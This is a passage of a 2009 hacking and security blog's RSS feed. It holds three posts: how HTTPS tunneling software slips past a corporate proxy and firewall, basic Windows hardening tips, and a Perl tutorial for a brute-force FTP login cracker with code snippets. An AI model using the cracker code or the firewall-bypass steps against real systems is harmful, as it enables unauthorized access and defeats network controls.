  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/48/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=48&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/03/28/if-web-applications-then-system-intrusion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>
	</item>
		<item>
		<title>How tunneling softwares compromise internal security</title>
		<link>http://xc0re.wordpress.com/2009/03/16/how-tunneling-softwares-compromise-internal-security/</link>
		<comments>http://xc0re.wordpress.com/2009/03/16/how-tunneling-softwares-compromise-internal-security/#comments</comments>
		<pubDate>Sun, 15 Mar 2009 19:44:22 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Firewall Evasion]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[hopster]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[tunnel]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=39</guid>
		<description><![CDATA[First off let me  explain what tunneling really is ? Well to make it simple i wont go into technical details but would say that for example you take a LAYS chips packet and put some thing  in side it , that you are usually not allowed to send and you seal it back and [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=39&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="aligncenter size-medium wp-image-40" title="tunnel" src="http://xc0re.files.wordpress.com/2009/03/35034154.jpg?w=300&#038;h=168" alt="tunnel" width="300" height="168" />First off let me  explain what tunneling really is ? Well to make it simple i wont go into technical details but would say that for example you take a LAYS chips packet and put some thing  in side it , that you are usually not allowed to send and you seal it back and send it through  mail. Now the mail check post will check that its a Lays Chips packet and forward it and when it reaches your frnd ,he just unwraps it and gets the other wise forbidden object.</p>
<p>Now a little technical stuff ! Usually what local tunneling softwares use is HTTPs tunneling . that is , HTTPS is used as the Lays Chips packet and the data you want to tunnel is inside the https wrapped  packet.</p>
<p><span style="color:#666699;">Usually the network design is such that before the gateway firewall there is usually a proxy server. And in a firewall policy table a proxy has more rights then the normal employee. That is it is allowed to access the internet with full rights and access any remote port where as a normal employee has to go through the proxy to access the internet and for him/her there are further checks at the proxy . for example </span></p>
<p><span style="color:#ff0000;">A) Employee &#8212;-(direct external nw access not allowed)&#8212;-&gt; X [Firewall]  X </span></p>
<p><span style="color:#ff0000;">B) Employee &#8212;&#8211; &gt; [Proxy] &#8212;&#8212;- &gt; [Firewall] ===&gt;(Allowed)</span></p>
<p><span style="color:#ff0000;"><span style="color:#666699;">In case of (B) the proxy has checks on orkut.com , youtube.com etc&#8230; so the employee cant access these websites. And Msn messenger / Yahoo messenger are blocked by the firewall. </span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;">Now that was the scenario. Now i will tell you people how it can be bypassed easily:</span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;">You download a software for instance  <a href="http://www.hopster.com"><img class="size-full wp-image-41 alignnone" title="hopsterlogo" src="http://xc0re.files.wordpress.com/2009/03/hopsterlogo.gif?w=87&#038;h=29" alt="hopsterlogo" width="87" height="29" /></a> . It has a live server which it connects to using HTTPS or port 443 ! and you can even give the Proxy ip address that you are using. Now its so simple it sends the packet to the proxy that it wants to connect to port 443 of the live server now the innocent proxy server forwards the request to that server through the firewall thus once connected , one can send any data out by just feeding it to hopster! </span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;">Usually in softwares like msn messenger ,  yahoo messenger etc ask you to give local proxy address and you just have to give your local hosts ip address or <strong>127.0.0.1</strong> and the software&#8217;s port number and you are good to go ! </span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;"><strong>Solution: </strong></span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;"><strong></strong></span></span><span style="color:#ff0000;"><span style="color:#000000;"><strong>The Network Administrator  should install such softwares to check the remote servers they connect to and block the ips on the proxy and at the firewall end. And usually there is one server with single live ip address so once blocked it cannot connect.</strong></span></span></p>
<p><span style="color:#ff0000;"><span style="color:#000000;"><strong> </strong></span></span></p>
<p><span style="color:#666699;"> </span></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/39/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/39/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/39/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=39&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/03/16/how-tunneling-softwares-compromise-internal-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>

		<media:content url="http://xc0re.files.wordpress.com/2009/03/35034154.jpg?w=300" medium="image">
			<media:title type="html">tunnel</media:title>
		</media:content>

		<media:content url="http://xc0re.files.wordpress.com/2009/03/hopsterlogo.gif" medium="image">
			<media:title type="html">hopsterlogo</media:title>
		</media:content>
	</item>
		<item>
		<title>Five hardcoded rules for System Security</title>
		<link>http://xc0re.wordpress.com/2009/03/15/five-hardcoded-rules-for-system-security/</link>
		<comments>http://xc0re.wordpress.com/2009/03/15/five-hardcoded-rules-for-system-security/#comments</comments>
		<pubDate>Sat, 14 Mar 2009 19:51:27 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Hacking & Security]]></category>
		<category><![CDATA[Antispyware]]></category>
		<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Avast]]></category>
		<category><![CDATA[Personal Firewall]]></category>
		<category><![CDATA[Zonealarm]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=29</guid>
		<description><![CDATA[
I always watch people complaining that their data got  currupted or they had a virus attack and they had to  reinstall windows ! Well thats because people usually  naive and innocent and the guy in the picture takes  advantage of that innocence.
Well today ill tell you five hardcoded rules that when
you [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=29&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="size-full wp-image-31 alignleft" title="Cookie" src="http://xc0re.files.wordpress.com/2009/03/hackerthumbnail1.jpg?w=124&#038;h=128" alt="Hacker" width="124" height="128" /></p>
<p>I always watch people complaining that their data got  currupted or they had a virus attack and they had to  reinstall windows ! Well thats because people usually  naive and innocent and the guy in the picture takes  advantage of that innocence.</p>
<p>Well today ill tell you five hardcoded rules that when</p>
<p>you get your windows installed or you install it your self , you should follow the rules.</p>
<ol>
<li><strong>After installing your windows , install an antivirus immediately. </strong><em>[People usually tell me that they dont run an AV (Antivirus) because it slows down their system. Well i will give a solution for this problem later near the end].</em></li>
<li> <strong>Once the AV is up and running and is updated , install a personal firewall.</strong></li>
<li><strong>Once the firewall is installed be sure to check if the Windows autoupdater is enabled.</strong></li>
<li><strong>Now follow me :</strong> goto<strong> My computer . </strong>When the window opens goto the<strong> tools menu &#8211;&gt; Folder options </strong>then when the folder options window opens goto the <strong>VIEW tab </strong>and under the hidden file &amp; folder option , check <strong>show hidden files &amp; folders </strong> then uncheck the <strong>hide extensions for known filetypes </strong> option.</li>
<li><strong>Install An AntiSpyware ! normally it comes with the package of an AV but i prefer a standalone Antispyware </strong><strong>program.</strong></li>
</ol>
<p>Well if one follows these rules and sticks to them , he/she wont need to reinstall the windows ,every time a virus comes.</p>
<p><strong>Now referring to the problems:</strong></p>
<ul>
<li>If the AV is heavy on your PC install a light weight AV .  A very good example is <a href="http://www.avast.com"><strong>AVAST AV</strong></a></li>
<li>Personal Firewalls , well pne of my favourite is <a href="http://www.zonealarm.com">ZoneAlarm</a></li>
</ul>
<p>Well thats all ! <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  hope every ones safe !</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/29/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=29&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/03/15/five-hardcoded-rules-for-system-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>

		<media:content url="http://xc0re.files.wordpress.com/2009/03/hackerthumbnail1.jpg" medium="image">
			<media:title type="html">Cookie</media:title>
		</media:content>
	</item>
		<item>
		<title>Writing a Simple Ftp cracker with perl.</title>
		<link>http://xc0re.wordpress.com/2009/03/12/writing-a-simple-ftp-cracker-with-perl/</link>
		<comments>http://xc0re.wordpress.com/2009/03/12/writing-a-simple-ftp-cracker-with-perl/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 18:04:57 +0000</pubDate>
		<dc:creator>xc0re</dc:creator>
				<category><![CDATA[Perl madness]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[disclaimer]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[username]]></category>

		<guid isPermaLink="false">http://xc0re.wordpress.com/?p=24</guid>
		<description><![CDATA[Well PERL is a scripting language with the help of which one can make alot of good stuff ! Today ill show you how to create a simple ftp cracker !
DISCLAIMER: Every thing mentioned in this blog/post is for educational puposes. And I would not be held responsible for any illegal use of the material [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=24&subd=xc0re&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Well PERL is a scripting language with the help of which one can make alot of good stuff ! Today ill show you how to create a simple ftp cracker !</p>
<p><strong>DISCLAIMER</strong>:<em><span style="color:#ff0000;"> Every thing mentioned in this blog/post is for educational puposes. And I would not be held responsible for any illegal use of the material by any one .</span></em></p>
<p><em><span style="color:#ff0000;"><span style="color:#0000ff;">Full version of the code is</span> <a href="http://xc0re.net/ftp_cracker.zip"><span style="color:#0000ff;">here</span> </a></span></em></p>
<p>First off we include  NET::FTP:</p>
<p>use Net::FTP;</p>
<p>now what we will do is , create an ftp socket !</p>
<p>$ftp = Net::FTP-&gt;new($IPaddress, Timeout =&gt; 5);</p>
<p>where the IP address is the Ip address of the target system and 5 is the timeout to try out the next connection attempt.</p>
<p>Now we just have to add the code to check for username and password.</p>
<p>if($ftp-&gt;login(&#8220;ftp&#8221;,&#8221;ftp&#8221;)) {<br />
$bogus = &#8220;CRACKED  Username : ftp password: ftp &#8220;;</p>
<p>print &#8220;$bogus \n&#8221;;</p>
<p>}<br />
In the abve code snippet the script checks against username = ftp  and password = ftp ! and if its attempt is a success itllgive a message :</p>
<p>CRACKED  Username : ftp password: ftp !</p>
<p>Well one can hard code the username and passwords as i have done or get them from a file !</p>
<p>Peace !</p>
<p><em><span style="color:#ff0000;"> </span></em><a href="http://xc0re.net/ftp_cracker.zip"></a></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/xc0re.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/xc0re.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/xc0re.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/xc0re.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/xc0re.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/xc0re.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/xc0re.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/xc0re.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/xc0re.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/xc0re.wordpress.com/24/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=xc0re.wordpress.com&blog=6594611&post=24&subd=xc0re&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://xc0re.wordpress.com/2009/03/12/writing-a-simple-ftp-cracker-with-perl/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/28cd0bd67b53ba6b0ef8be0e794de1c1?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">xc0re</media:title>
		</media:content>
	</item>
	</channel>
</rss>